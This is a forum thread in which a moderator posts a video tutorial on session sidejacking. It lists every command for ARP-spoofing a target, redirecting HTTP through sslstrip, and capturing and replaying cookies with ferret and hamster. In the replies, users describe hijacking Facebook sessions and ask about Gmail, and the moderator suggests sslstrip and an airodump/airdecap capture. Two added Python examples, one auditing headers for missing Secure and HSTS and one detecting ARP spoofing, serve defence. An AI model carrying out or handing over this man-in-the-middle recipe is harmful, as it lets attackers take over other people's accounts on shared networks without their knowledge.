Thread: [Video] Session Sidejacking (Ferret and Hamster)

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default [Video] Session Sidejacking (Ferret and Hamster)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
    Download video: http://www.mediafire.com/?3pz9w85jd4s328q
    What is this?
    This video demos how to do "Session Sidejacking". Sidejacking is where you clone your target's cookies, therefore you're "sharing" their identity for that account (without ever knowing the username or password)!


    What do I need?

    > arpspoof
    > sslstrip
    > Hamster (and Ferret)
    *all in BackTrack 4 Final*


    Software
    Name: arpspoof (DSniff)
    Version: 2.3
    Home Page: http://www.monkey.org/~dugsong/dsniff/
    Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

    Name: sslstrip
    Version: 0.6
    Home Page: http://www.thoughtcrime.org/software...rip/index.html
    Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

    Name: Hamster Sidejacking Tool
    Version: 2.0
    Home Page: http://hamster.erratasec.com/
    Download Link: http://hamster.erratasec.com/downloa...er-2.0.0.tar.z


    Commands:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.1.104 192.168.1.1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -p -k -f
    
    /pentest/sniffers/hamster/ferret -i eth0
    
    /pentest/sniffers/hamster/hamster
    
    Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
    Konqueror -> http://hamster
    Notes:
    Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)
    Video length: 2:39
    Capture length: 3:42

    Blog Post: http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1877-%5Bvideo%5D-session-sidejacking-ferret-hamster.html
    Last edited by g0tmi1k; 03-05-2011 at 03:03 PM.
    Have you...g0tmi1k?
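
From the defending side, the setup in the post above depends on two server-side gaps: session cookies issued without the `Secure` flag (so they cross the wire in plain HTTP where they can be copied) and no `Strict-Transport-Security` header (so the browser accepts the HTTP downgrade that sslstrip performs). The following is an added example, not part of the original post; the sample response and the function names are constructed for illustration.

```python
# Added example: audit an HTTP response for the two header gaps that make
# cookie sidejacking and HTTPS stripping possible. The response is constructed.

SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: SESSIONID=abc123; Path=/; HttpOnly\r\n"
    "Set-Cookie: prefs=dark; Path=/; Secure\r\n"
    "\r\n"
)


def parse_headers(raw):
    """Return a list of (lowercased name, value) pairs from a raw header block."""
    headers = []
    for line in raw.split("\r\n")[1:]:      # skip the status line
        if not line:                        # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def audit_response(raw):
    """List findings: cookies lacking Secure, and a missing HSTS header."""
    headers = parse_headers(raw)
    findings = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        # Attribute names are case-insensitive; values (Path=/ etc.) are ignored here.
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "secure" not in attrs:
            findings.append(f"{cookie_name}: no Secure flag, cookie is sent over plain HTTP")
    if not any(n == "strict-transport-security" for n, _ in headers):
        findings.append("no Strict-Transport-Security header, HTTP downgrade is accepted")
    return findings


if __name__ == "__main__":
    for finding in audit_response(SAMPLE_RESPONSE):
        print(finding)
```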

  2. #2

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Great video, thank you for posting this. I am very interested in trying this out myself.

    Well done!

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    Big Sky Country
    Posts
    17

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Have you been able to do this against a victim logging into facebook/myspace? Just curious, as when I try it it gives a ton of cookies, and none seem to work. Thanks

  4. #4
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    1

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    What software do you use for creating the videos?

  5. #5
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    4

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Thanks for sharing, great video, keep going.

  6. #6
    Just burned his ISO Bandito's Avatar
    Join Date
    Jan 2010
    Posts
    5

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    I was able to successfully sidejack my facebook account. However, I am having issues with sidejacking gmail. The victim I used was an XP laptop. I tried to login to gmail on the xp machine, the gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my gmail to begin with.

    Any ideas? Is gmail not allowing unencrypted logins now?

  7. #7
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Quote Originally Posted by freemymind View Post
    Great video, thank you for posting this. I am very interested in trying this out myself.

    Well done!
    Quote Originally Posted by Thunder-R View Post
    Thanks for sharing, great video, keep going.
    Thanks for the thanks


    Quote Originally Posted by A Student View Post
    Have you been able to do this against a victim logging into facebook/myspace? Just curious, as when I try it it gives a ton of cookies, and none seem to work. Thanks
    Yep. Works for me. Try again?

    Quote Originally Posted by CyberGod View Post
    What software do you use for creating the videos?
    Camtasia Studio


    Quote Originally Posted by Bandito View Post
    I was able to successfully sidejack my facebook account. However, I am having issues with sidejacking gmail. The victim I used was an XP laptop. I tried to login to gmail on the xp machine, the gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my gmail to begin with.

    Any ideas? Is gmail not allowing unencrypted logins now?
    Try SSLStrip.
    Have you...g0tmi1k?

  8. #8
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Session Sidejacking (Ferret and Hamster)

    Quote Originally Posted by pen2paper View Post
    Could someone please help me, I have successfully cracked my WPA key using your method g0tmi1k thanks a lot, so I'm guessing my monitoring / injection is working.

    I am testing this on xp sp2 with no av or firewall enabled, with BT4 Final.

    I am using wlan0, does monitor mode have to be enabled? Also do I need to be connected to the same router as my xp machine?

    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

    is 192.168.1.104 192.168.1.1 the IP address and default gateway of the xp machine? if so which one is first or doesn't it matter. Also wouldn't I do arpspoof -i wlan0 -t 192.168.1.104 192.168.1.1

    after following this command

    sslstrip -p -k -f

    I do not receive the message "sslstrip 0.6 by Moxie Marlinspike running..."

    please help
    Try this:

    1. Capture the traffic via airodump.
    2. Decrypt via airdecap
    3. Use ferret (with the -r [filename])
    4. Use hamster

    By doing it that way - you don't have to be connected to the access point (because you're in monitor mode). Therefore you don't have to worry about what interfaces to use, and doing an ARP attack (using arpspoof).

    That's odd about sslstrip - try:
    Code:
    whereis sslstrip
    sslstrip -h
    The first command - makes sure it is installed.
    The second command - should display "help"

    In reply to your arpspoof question:

    • the -t bit - you're selecting your target. You want to put your target's IP address there.
    • The next IP address is the IP address you're spoofing (in this case the gateway).
    • arpspoof I believe is only doing it one way. e.g. tricking the target you're the gateway, NOT the gateway you're the target.
    • and yes if wlan0 is the interface you're connecting to the network with, you need to use that.


    Quote Originally Posted by siviog1 View Post
    Tested this using BTr1 on netbook connected to network via wlan0 - host pc was win7- worked like a charm
    Thanks for feedback. Good to know it still works. (=
    Have you...g0tmi1k?
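
The arpspoof behaviour described in the reply above (a host telling the target that the gateway's IP lives at a different MAC) is visible on the wire as a change in an IP-to-MAC binding. The following is an added example, not part of the original post, showing how a monitor can flag that change; the observations, MAC addresses and the `detect_arp_spoofing` name are constructed, and the first binding seen for each IP is assumed to be the legitimate one.

```python
# Added example: flag ARP replies that rebind an IP to a different MAC.
# Observations are constructed; in practice they would come from a packet
# capture or an arpwatch-style log on the monitored segment.

GATEWAY_IP = "192.168.1.1"   # gateway address used in the thread

# (seconds, sender IP, sender MAC) for each ARP reply seen (constructed)
OBSERVATIONS = [
    (0, "192.168.1.1", "00:11:22:33:44:55"),
    (1, "192.168.1.104", "aa:bb:cc:00:00:04"),
    (2, "192.168.1.50", "de:ad:be:ef:00:50"),
    (10, "192.168.1.1", "de:ad:be:ef:00:50"),   # gateway IP claimed by another host
    (12, "192.168.1.1", "de:ad:be:ef:00:50"),   # repeated poisoning reply
    (14, "192.168.1.1", "00:11:22:33:44:55"),   # real gateway answering again
]


def detect_arp_spoofing(observations, gateway_ip):
    """Return one alert per (IP, MAC) pair that contradicts the baseline."""
    baseline = {}      # ip -> first MAC seen for it (assumed legitimate)
    owner = {}         # mac -> first IP that MAC was seen announcing
    alerted = set()    # (ip, mac) pairs already reported, to avoid duplicates
    alerts = []
    for ts, ip, mac in observations:
        expected = baseline.setdefault(ip, mac)
        owner.setdefault(mac, ip)
        if mac == expected or (ip, mac) in alerted:
            continue
        alerted.add((ip, mac))
        alerts.append({
            "time": ts,
            "ip": ip,
            "expected_mac": expected,
            "claimed_mac": mac,
            "claimant_ip": owner[mac],   # which host the rogue MAC belongs to
            "severity": "high" if ip == gateway_ip else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(OBSERVATIONS, GATEWAY_IP):
        print(alert)
```

Static ARP entries for the gateway or switch-level dynamic ARP inspection prevent the rebinding outright; this check only reports it.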
